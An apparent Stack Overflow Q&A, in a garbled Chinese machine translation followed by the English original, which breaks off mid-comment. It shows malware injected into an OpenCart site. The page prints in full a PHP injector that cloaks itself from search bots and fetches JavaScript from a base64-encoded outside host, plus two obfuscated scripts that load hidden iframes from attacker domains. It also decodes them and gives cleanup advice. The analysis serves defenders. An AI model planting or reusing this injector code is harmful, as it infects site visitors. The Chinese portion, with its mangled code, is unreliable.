Opencart：阿贾克斯JSON响应未知字符 [英] Opencart: Ajax json response unknown characters

问题描述

我工作的电子商务网站。它工作正常，但突然间所有的Ajax功能，没有工作。 当我在Firebug检查AJAX code，我可以看到一些JS字符串连接与响应：

  {成功：成功：你已经添加了＆LT; A HREF = \的http：\ / \ / www.test.com \ / exmple \＆GT;样品＆LT; \ /一＆gt;到你的＆所述; A HREF = \的http：\ / \ / www.test.com
   ？\的index.php路线=结帐\ /车\＆GT;购物车＆LT; \ / a取代;！，共：2070
   件，量：$ 2,028.60}＆其中;脚本＆GT; E = EVAL; V =0+×; a = 0时;尝试{A和= 2}赶上（q）的{一个= 1}，如果（！一个）
   {尝试{文件[\ x62ody] ^ =〜1;}赶上（Q） {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
 

我得到在Firefox这个错误只是......

这是他们加入到index.php文件。

 ＆LT; PHP
    如果（！使用isset（$ sRetry））
    {
    全球$ sRetry;
    $ sRetry = 1;
        //全球机器人统计这code使用
        $ sUserAgent =用strtolower（$ _ SERVER ['HTTP_USER_AGENT']）; //看起来对谷歌机器人serch主页
        $ stCurlHandle = NULL;
        $ stCurlLink =;
        如果（（的strstr（$ sUserAgent，'谷歌'）==假）及及（的strstr（$ sUserAgent，'雅虎'）==假）及及（的strstr（$ sUserAgent，'百度'）==假）及及（的strstr（$ sUserAgent，'的MSN'）==假）及及（的strstr（$ sUserAgent，'戏'）==假）及及（的strstr（$ sUserAgent，'铬'）==假）及及（的strstr（$ sUserAgent，'兵'）==假）及及（的strstr（$ sUserAgent，'狩猎'）==假）及及（的strstr（$ sUserAgent，'机器人'）== FALSE））//机器人来
        {
            如果（使用isset（$ _ SERVER ['REMOTE_ADDR']）==真＆功放;＆安培;使用isset（$ _ SERVER ['HTTP_HOST']）==真）{//创建僵尸analitics
            $ stCurlLink = base64_de code（ 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlen$c$c($_SERVER['REMOTE_ADDR']).'&useragent='.urlen$c$c($sUserAgent).'&domainname='.urlen$c$c($_SERVER['HTTP_HOST']).'&fullpath='.urlen$c$c($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @ $ stCurlHandle = curl_init（$ stCurlLink）;
        }
        }
    如果（$ stCurlHandle！== NULL）
    {
        curl_setopt（$ stCurlHandle，CURLOPT_RETURNTRANSFER，1）;
        curl_setopt（$ stCurlHandle，CURLOPT_TIMEOUT，6）;
        $ sResult = @curl_exec（$ stCurlHandle）;
        如果（$ sResult [0] ==O）
         {$ sResult [0] =;
          回声$ sResult; //统计code端
          }
        curl_close（$ stCurlHandle）;
    }
    }
    ？＆GT;
 

我只是删除了code现在它的工作罚款......

解决方案

要糟糕了，你没有给我们，PHP注入的完整的JavaScript（请的把它添加到你的问题，如果你仍然有它，所以我们可以 德code 它）。但是，非常感谢你分享PHP的背后！

删除PHP脚本确实是解决方案，但是 你应该首先了解如何你有'黑客攻击'/'感染'的！

• 也许弱密码或者更确切地说，新的漏洞？
• 此外，开发/维护/贡献者已经（有）（FTP /管理/ CMS）访问您网站上的所有计算机，必须检查密码窃取/嗅探​​恶意软件（如访问你的/另外的结果受感染的网站）。
• 在安装一个插件胭脂/模块，您的网站/服务器上？
• 另外，也可以使整个服务器（和其上的所有网站）被comprimized。这可能是明智的，你的主机供应商联系，以

注意，这种恶意软件通常是回升，由谷歌：他们将添加一个警告，这样的黑客攻击网站的索引：的此网站可能会损害您的计算机
。 获得这个概念去掉需要一个请求恶意软件审查与谷歌网站管理员工具（我不​​知道，如果谷歌会自动重新扫描的时间x量你的页面，如果你不报你的页面固定的，我也不知道，如果你可以报告你的页面无固定谷歌，网站管理员工具，所以要，如果你不想让你的手机号码，以谷歌！）警告说。

如果一个人的base64德code S中的字符串 aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw 从PHP的code，一个得到的网址： http://mbrowserstats.com/statE/stat.php

您被感染的PHP网站上使用上述网址与 GET -string
<$c$c>?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
获取自定义的独特按需JavaScript来在标记插入送达（目标!! 的）访问者。

要取消$ C C的插入的那个游客，独特的javascript有效载荷$，我迅速刮起了一阵 德codeR （也适用于的部分有效载荷，使用字符 _ 作为分隔符和偏移的 -7 对这些基地的 16 号）。
（部分）字符串： <$c$c>10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
德codeS到：

 如果（document.getElementsByTagName（'身体'）[0]）{
 

---

我想分享我我得到了变异的分析，解释它是如何工作（希望这将有助于其他人）：
该网站，我访问了（在palemoon =火狐）突然开始Java和一个cmd框弹出。
铬@页的
该文件的查看源文件，透露了一个模糊的脚本，在服务（插入）的在的（有一个前导空格）的 HTML 标签

  <script>w=window;aq="0"+"x";ff=String;ff=ff.fromChar$c$c;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
＆LT; HTML＆GT;
＆LT; HEAD＆GT;
＆LT;冠军＆GT;等等...
 

通过 jsbeautifier.org 运行它清理了起来（以前我加我的人解析评论）为：

  W =窗口; // hmmkay，注：重复使用lateron
水溶液=0+×; //所以......0X，闻起来像十六进制
FF =字符串; //哈哈，整洁，FF是字符串
FF = ff.fromChar code; //和FF现在是字符串的fromChar code方法
尝试 {
    文献[\ x62ody] ^ =〜1; //我猜这应该失败
}赶上（d21vd12v）{//所以，剩下的被执行：
    V = 123; // bliep？ 42？这里是龙..又名没用
    VZS = FALSE; //啊，你能猜出这导致？
    尝试{//不知道为什么，这个测试是在这里
        文件;
    }赶上（Q）{//但感染这不应该运行
        VZS = 1;
    }
    如果（！VZS）E = W [的eval]; // false将成为真正的让E = EVIL
    如果（1）{//大声笑，如果属实，确定...
                                     //啊，女的有效载荷，一个数组（按分割）
                                     // 640十六进制数字
        F = "0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74" [分裂]（，）;
    }
    W = F; //稀释杂耍W¯¯到f
    S = []; // preparing s到接收德codeD字符串
    对于（I = 2  -  2;  - 我+ 640 = 0; i + = 1！）{//哈哈，OK：（2-2 = 0;笑;我++）
        J =; //忙里忙外的艺术家一遍
        如果（（031 ==的0x19））如果（E）S = S + FF（E（AQ +（W [J]））+ 9）; // 9偏移
    } // 31oct = 19hex = 25 =真，如果EVAL，看马，没有parseInt函数被邪恶
    FAFA = E; // OK停止杂耍。 FAFA = EVIL
    FAFA（S）//我们走吧：EVIL（德codeD字符串）
}
 

正如人们现在可以阅读，他们经历了很多欺骗病毒扫描箍跳。

我重新分解这（我的理解）为：

  W =/ *有效载荷：逗号分隔十六进制单向code字* /[分裂（）;
S ='';
对于（i = 0; I＆LT; 640;我++）{
    S + = String.fromChar code（parseInt函数（W [I]，16）+ 9）; //德code
}
的eval（S）//执行
 

使用我去codeR（设置为基本 16 ，分隔符，和偏移 9 ）有效载荷去codeD 为：

 如果（document.getElementsByTagName（'身体'）[0]）{
    iframer（）;
} 其他 {
    的document.write（＆LT; IFRAME SRC =？HTTP：//rotatethespin.com：8000 / lhhqnccqs ftbhkpmcort = 5186751'宽度=100高度=100的风格=宽度：100像素，高度：100像素;位置：绝对的;左：-10000px;顶部：0;'＆GT;＆LT; / IFRAME＆gt;中）;
}
功能iframer（）{
    变种F = document.createElement('iframe');f.setAttribute('src','http://rotatethespin.com:8000/lhhqnccqs?ftbhkpmcort=5186751');f.style.left='-10000px';f.style.top='0';f.style.position='absolute';f.style.top='0';f.setAttribute('width','100');f.setAttribute('height','100');
    document.getElementsByTagName（'身体'）[0] .appendChild（F）;
}
 

请注意，这导致code缩进2和3的标签的（业余的或欺骗的VirusScan？），我删除了可读性。还行结束符是CR（13dec）（是作者/使用较旧的MAC脚本小子？）。

所以，现在我们所有的code能（最终）简单地解释发生了什么：

• PHP脚本卷曲SA访问者/网站独特的JavaScript来在担任标记注入
• 在这（通过PHP）注入的JavaScript将注入一个 IFRAME 在文档的体（勇敢地由浏览器辅助因为身体还不存在），位于 -10000px 从左侧（从视线中消失），在访问的网页（对参观者浏览器）和
• 注入 IFRAME 加载一个专门针对（在用户和网站用户访问）外部网页（含天知道什么样的烂摊子/恶意软件/病毒/的rootkit，在我的情况下，从 rotatethespin.com:8000 ， muruno-vaser.info:8000 ， epomota.com 等）。

我也得到了文档的实时HTML与这个书签验证了这一点

 的javascript：（函数（）{警报（document.documentElement.innerHTML）;}）（）
 

这也显示出注入的iframe的code源代码中

我用下一个书签的IFRAME进入视图（假设仅有1 IFRAME）：

 的javascript：（函数（）{document.getElementsByTagName（'IFRAME'）[0] .style.left =0px​​;}）（）
 

当然我们也可以使用Firebug和类似工具（取决于浏览器）。

我还注意到，当使用大多数基于网络的工具（甚至是W3C验证）来获取被感染网站的源代码，PHP没有插入JavaScript中，使网站看起来没有感染 <！BR > 我想一个简单的telnet命令来（安全）得到感染code时，也有这个问题。看到它背后的PHP code后，但是，我意识到，我用几个HTTP命令（特别是引用）。
这样做： 的telnet infected-site.com 80 ，然后粘贴下面终于给了被感染的标记源：

GET /path.php?page=something HTTP / 1.1
主持人：infected-site.com
用户代理：Mozilla的/ 5.0（Windows NT的5.1; RV：12.0）的Gecko / 20100101 Firefox的/ 12.0
接受：text / html的，是application / xhtml + xml的，应用程序/ XML; Q = 0.9，* / *; Q = 0.8
接受语言：NL，EN-US; Q = 0.7，连接; Q = 0.3
引用站点：http://infected-site.com/index.php
连接：关闭

需要注意的是这种方式，也可以安全地探索（和逆向工程）中的iframe等!!源

我还注意到，该网站拥有者的电脑也的没有的获取被感染的code！这可能是因为他的机器被感染的或的，因为那分发JavaScript的服务器没有提供一个脚本，因为它知道客户机已经被感染了。

更新：具有这样的回答一组有效的工具，我重新检查了包括网站今天（后一个良好的夜间休息），并得到了完全不同的脚本注入（但仍基于相同技术我在这个答案解释）。

<$p$p><$c$c><script>ss=eval("Str"+"ing");d=document;a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,151,164,163,161,163,170,145,62,147,163,161,63,160,154,170,173,175,175,164,154,154,103,152,151,146,165,175,147,160,147,101,71,65,74,72,73,71,65,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"["split"](","));for(i=0;i<a.length;i+=1){a[i]=parseInt(a[i],8)-(7-3);}try{d.body--}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss["fromChar$c$c"].apply(ss,a));</script>

请注意，这一次的数字是八进制（基数8）（由分离，与 -4 ）。
所以，我更新了我去codeR包含一个底座/基数设置（在这个答案全部取决于链接），并作为一个可以看到有效载荷仍然是相同的（除了它指向的域）。

---

我发现了这一问题，谷歌搜索文档\ [\ x62ody\] ^ =〜1 这给了（大多无用/感染）834的结果。

我今天偶然在恶意软件有上面的字符串和pretty的唯一字符串 d21vd12v 里面，这给8300（也大多无用/感染）的结果。

然而<一href="http://www.google.com/search?q=//%20This%20$c$c%20use%20for%20global%20bot%20statistic">googling //全球机器人统计这code使用'（在你提问中所提供的PHP中）提供的超过410万个结果（可以追溯到至少2010年），这表明还单词preSS是，Joomla等都是这种'技术'的受害者。

阅读其中的一些环节（如<一个href="http://security.stackexchange.com/questions/14729/malware-$c$c-added-when-site-viewed-externally">this, 这个或的这个）我得到的IM pression这个开始是欺骗搜索引擎（如谷歌），以提高网页排名的方式。这在创建自己造成恶意孔的价格。
当然，专门在现在散播恶意软件的变种试图从搜索引擎隐藏自己。

I am working on e-commerce website. It was working fine but suddenly all ajax functions didn't work. When I checked the ajax code in firebug I can see some js strings are attached with that response:

  {"success":"Success: You have added <a href=\"http:\/\/www.test.com\/exmple\">sample<\/a> to your <a href=\"http:\/\/www.test.com
   \/index.php?route=checkout\/cart\">shopping cart<\/a>!","total":"2070
   items","amount":"$2,028.60"} <script>e=eval;v="0"+"x";a=0;try{a&=2}catch(q){a=1}if(!a)
   {try{document["\x62ody"]^=~1;}catch(q) {a2="_"}z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10

I am getting this error in firefox only....

This is what they added into the index.php file.

            <?php
    if (!isset($sRetry))
    {
    global $sRetry;
    $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @$stCurlHandle = curl_init( $stCurlLink ); 
        }
        } 
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
        $sResult = @curl_exec($stCurlHandle); 
        if ($sResult[0]=="O") 
         {$sResult[0]=" ";
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle); 
    }
    }
    ?>

I just removed the code now its working fine...

解决方案

To bad you didn't give us the full javascript that php injected (please add it to your question if you still have it, so we can decode it). But thank you so much for sharing the php behind it!!!

Removing the php script is indeed the solution, but you should find out how you got 'hacked'/'infected' in the first place!!

• Maybe a weak password or rather new vulnerability?
• Also, all the computers of developers/maintainers/contributers that have (had) (ftp/admin/cms) access to your website, must be checked for password-stealing/sniffing malware (as a result of visiting your/another infected website).
• Installed a rouge plugin/module on your website/server?
• It is also possible that the whole server (and all websites on it) is comprimized. It might be wise to contact your hoster to.

Note that such malware is often picked up by google: they'll add a warning to such a hacked website's index: 'This site may harm your computer.'
Getting this notion removed requires a 'Request a malware-review' with google webmaster-tools (I don't know if google will automatically rescan your page in x amount of time if you don't report your page as fixed, neither do I know if you can report your page as fixed without google-webmaster tools, so be warned if you don't want to give your cellphone-number to google!!!).

If one base64 decodes the string aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw from your php-code, one gets the url: http://mbrowserstats.com/statE/stat.php

Your infected php-website used the above url with the GET-string
?ip=YOUR_IP&useragent=YOUR_BROWSER&domainname=INFECTED_WEBSITE_DOMAIN&fullpath=INFECTED_WEBSITE_PAGE&check='.isset($_GET['look'])
to fetch a custom unique on-demand javascript to insert in the markup served to the (targeted!!) visitor.

To decode the payload of that inserted visitor-unique javascript, I quickly whipped up a decoder (that also works for your partial payload, using the character _ as separator and an offset of -7 on those base 16 numbers).
The (partial) string: 10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10
decodes to:

        if (document.getElementsByTagName('body')[0]){

---

I want to share my analysis of the variant I got, to explain how it works (hoping it will help others):
The website I visited (in palemoon=firefox) suddenly started java and a cmd-box popped up.
Cr@p.
'View source' of the document, revealed an obfuscated script that was 'served' (inserted) before the html tag (with a leading space):

 <script>w=window;aq="0"+"x";ff=String;ff=ff.fromCharCode;try{document["\x62ody"]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(q){vzs=1;}if(!vzs)e=w["eval"];if(1){f="0,0,60,5d,17,1f,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,20,72,4,0,0,0,60,5d,69,58,64,5c,69,1f,20,32,4,0,0,74,17,5c,63,6a,5c,17,72,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,19,33,60,5d,69,58,64,5c,17,6a,69,5a,34,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,17,6e,60,5b,6b,5f,34,1e,28,27,27,1e,17,5f,5c,60,5e,5f,6b,34,1e,28,27,27,1e,17,6a,6b,70,63,5c,34,1e,6e,60,5b,6b,5f,31,28,27,27,67,6f,32,5f,5c,60,5e,5f,6b,31,28,27,27,67,6f,32,67,66,6a,60,6b,60,66,65,31,58,59,6a,66,63,6c,6b,5c,32,63,5c,5d,6b,31,24,28,27,27,27,27,67,6f,32,6b,66,67,31,27,32,1e,35,33,26,60,5d,69,58,64,5c,35,19,20,32,4,0,0,74,4,0,0,5d,6c,65,5a,6b,60,66,65,17,60,5d,69,58,64,5c,69,1f,20,72,4,0,0,0,6d,58,69,17,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6a,69,5a,1e,23,1e,5f,6b,6b,67,31,26,26,69,66,6b,58,6b,5c,6b,5f,5c,6a,67,60,65,25,5a,66,64,31,2f,27,27,27,26,63,5f,5f,68,65,5a,5a,68,6a,36,5d,6b,59,5f,62,67,64,5a,66,69,6b,34,2c,28,2f,2d,2e,2c,28,1e,20,32,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,34,1e,24,28,27,27,27,27,67,6f,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,34,1e,58,59,6a,66,63,6c,6b,5c,1e,32,5d,25,6a,6b,70,63,5c,25,6b,66,67,34,1e,27,1e,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,6e,60,5b,6b,5f,1e,23,1e,28,27,27,1e,20,32,5d,25,6a,5c,6b,38,6b,6b,69,60,59,6c,6b,5c,1f,1e,5f,5c,60,5e,5f,6b,1e,23,1e,28,27,27,1e,20,32,4,0,0,0,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,6a,39,70,4b,58,5e,45,58,64,5c,1f,1e,59,66,5b,70,1e,20,52,27,54,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,5d,20,32,4,0,0,74"["split"](",");}w=f;s=[];for(i=2-2;-i+640!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}fafa=e;fafa(s)}</script>
<html>
<head>
<title> etcetera...

Running it through jsbeautifier.org cleaned that up (before I added my human parsing comments) to:

w = window;                          //hmmkay, note:reused lateron
aq = "0" + "x";                      //so.. '0x', smells like hex
ff = String;                         //haha, neat, ff is String
ff = ff.fromCharCode;                //and ff is now String's fromCharCode method
try {
    document["\x62ody"] ^= ~1;       //I'm guessing this should fail
} catch (d21vd12v) {                 //so all the rest gets executed:
    v = 123;                         //bliep? 42? Here be dragons.. aka useless
    vzs = false;                     //ahh, can you guess where this leads?
    try {                            //no idea why this test is here
        document;
    } catch (q) {                    //but for an infection this should NOT run
        vzs = 1;
    }
    if (!vzs) e = w["eval"];         //false will become true so e = EVIL
    if (1) {                         //lol, if true, ok...
                                     //ahh, f the payload, an array (by split) of
                                     //640 hex-numbers
